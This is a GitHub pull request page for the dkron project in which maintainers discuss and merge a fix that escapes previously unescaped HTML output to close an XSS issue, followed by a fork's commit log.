Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix XSS vulnerability #922

Merged
merged 3 commits into from Mar 14, 2021
Merged

Fix XSS vulnerability #922

merged 3 commits into from Mar 14, 2021

Conversation

yvanoers
Copy link
Collaborator

Fixes #921.

The original code seemed to deliberately use unescaped HTML. I'm hoping that was accidental and this doesn't break anything.

vcastellm
vcastellm approved these changes Mar 14, 2021
View reviewed changes
Copy link
Member

@vcastellm vcastellm left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I remember that I went for the unsafe option, but I don't know why, have you checked the output reads correctly and is well formatted?

@yvanoers
Copy link
Collaborator Author

I checked that the output gets encoded properly. Judge for yourself:
Before:
image
After:
image

vcastellm
vcastellm approved these changes Mar 14, 2021
View reviewed changes
Copy link
Member

@vcastellm vcastellm left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

LGTM thanks!

@vcastellm vcastellm merged commit b6b593a into distribworks:master Mar 14, 2021
@sc0rp10
Copy link
Contributor

sc0rp10 commented Mar 14, 2021

@Victorcoder could you please also tag a release with that fix?

@yvanoers yvanoers deleted the fix-xss-vuln branch March 14, 2021 22:43
MGSousa pushed a commit to MGSousa/dkron that referenced this pull request Mar 15, 2021
Squashed commit of the following:
52c44af 
commit a127a76
Merge: ffaf975 347cf72
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Mar 15 15:39:45 2021 +0000

    Merge branch 'master' of https://github.com/MGSousa/dkron

commit ffaf975
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Mar 15 13:07:06 2021 +0000

    Remove custom status for untriggered/pristine jobs && Minor changes

commit 8c9440b
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Mar 15 11:44:07 2021 +0000

    Added public directory

commit aa96dcf
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Wed Mar 10 12:52:52 2021 +0000

    Added Pristine Jobs to React UI

commit eb18129
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Jan 25 11:53:02 2021 +0000

    FIX change header name DKRON_PRISTINE_JOBS

commit d1c3184
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Jan 25 10:22:15 2021 +0000

    Provide filter query by job displayName, add disabled pristine jobs reports

commit 347cf72
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Mar 15 13:07:06 2021 +0000

    Remove custom status for untriggered/pristine jobs && Minor changes

commit 92fd8f5
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Mar 15 11:44:07 2021 +0000

    Added public directory

commit b6b593a
Author: Yuri van Oers <yvanoers@gmail.com>
Date:   Sun Mar 14 23:40:46 2021 +0100

    Fix XSS vulnerability (distribworks#922)

    * Tidy modules

    * Fix "can't import package" error

    * Fix XSS vulnerability

commit 2b2a2b2
Author: Etienne Duclos <duclosetienne@gmail.com>
Date:   Sun Mar 14 13:41:24 2021 -0400

    feat(ui): add a filter on disabled state (distribworks#923)

commit 31c6324
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Wed Mar 10 12:52:52 2021 +0000

    Added Pristine Jobs to React UI

commit 92a9709
Author: Victor Castell <victor@victorcastell.com>
Date:   Tue Mar 9 09:37:53 2021 +0100

    Update go.sum

commit 296a9fa
Author: Victor Castell <victor@victorcastell.com>
Date:   Mon Mar 8 22:44:39 2021 +0100

    Update changelog

commit 1a982e0
Author: Victor Castell <victor@victorcastell.com>
Date:   Mon Mar 8 22:30:55 2021 +0100

    Add the ui/public dir (distribworks#919)

    It was missing because of wrong gitignore

commit 20ab436
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Jan 25 11:53:02 2021 +0000

    FIX change header name DKRON_PRISTINE_JOBS

commit 5be4196
Author: Miguel Sousa <miguelsousa@MacBook-Pro-de-Miguel.local>
Date:   Mon Jan 25 10:22:15 2021 +0000

    Provide filter query by job displayName, add disabled pristine jobs reports
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@vcastellm vcastellm vcastellm approved these changes

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

XSS injection in output panel
3 participants
@yvanoers @sc0rp10 @vcastellm